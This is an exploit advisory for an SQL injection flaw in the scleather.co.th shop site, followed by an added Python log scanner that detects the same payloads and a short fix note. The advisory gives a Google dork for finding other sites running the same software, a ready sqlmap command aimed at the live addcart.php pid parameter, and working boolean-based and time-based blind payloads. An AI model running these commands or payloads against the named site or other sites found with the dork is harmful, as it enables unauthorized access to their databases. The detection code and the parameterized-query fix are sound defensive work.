****************************
#Exploit Title: scleather - SQL Injection vulnerability
#Date: 2021-06-27
#Exploit Author: Mahdi Karimi
#Vendor Homepage: www.scleather.co.th
#Google Dork: "Powered by scleather"
#Tested On: Windows 10
sqlmap:
sqlmap -u "http://www.scleather.co.th/addcart.php?pid=1096" --dbs
Testing Method:
- boolean-based blind
- time-based blind
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=1096' AND 5351=5351 AND 'YCAF'='YCAF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pid=1096' AND (SELECT 8639 FROM (SELECT(SLEEP(5)))WmEq) AND 'HjJG'='HjJG
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************
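
A detection check built from the two payload shapes above, as an added example that is not part of the original advisory: it scans web access logs for requests whose pid value is not a plain integer and labels which blind technique the value resembles. The log lines, regexes and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the advisory); addresses are
# documentation placeholders. Lines 2 and 3 carry the two payload shapes
# listed above, URL-encoded as a client would send them.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Jun/2021:10:00:01 +0000] "GET /addcart.php?pid=1096 HTTP/1.1" 200 512
192.0.2.11 - - [27/Jun/2021:10:00:05 +0000] "GET /addcart.php?pid=1096%27%20AND%205351%3D5351%20AND%20%27YCAF%27%3D%27YCAF HTTP/1.1" 200 512
192.0.2.11 - - [27/Jun/2021:10:00:09 +0000] "GET /addcart.php?pid=1096%27%20AND%20%28SELECT%208639%20FROM%20%28SELECT%28SLEEP%285%29%29%29WmEq%29%20AND%20%27HjJG%27%3D%27HjJG HTTP/1.1" 200 512
192.0.2.12 - - [27/Jun/2021:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Delay functions used by time-based blind probes against MySQL.
TIME_BASED = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)
# Self-comparison such as AND 5351=5351 or AND 'x'='x (back-reference \1).
BOOLEAN_BASED = re.compile(r"\b(?:AND|OR)\b\s+'?(\w+)'?\s*=\s*'?\1\b", re.I)


def classify_pid(value):
    """Return None for a plain numeric id, else a label for the anomaly."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if TIME_BASED.search(value):
        return "time-based blind"
    if BOOLEAN_BASED.search(value):
        return "boolean-based blind"
    return "non-numeric pid"


def scan(log_text, param="pid"):
    """Return (line number, label, decoded value) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            label = classify_pid(value)
            if label:
                findings.append((lineno, label, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule that drives classify_pid is the server-side fix: reject any pid that is not a plain integer and bind it as a query parameter instead of concatenating it into the SQL string.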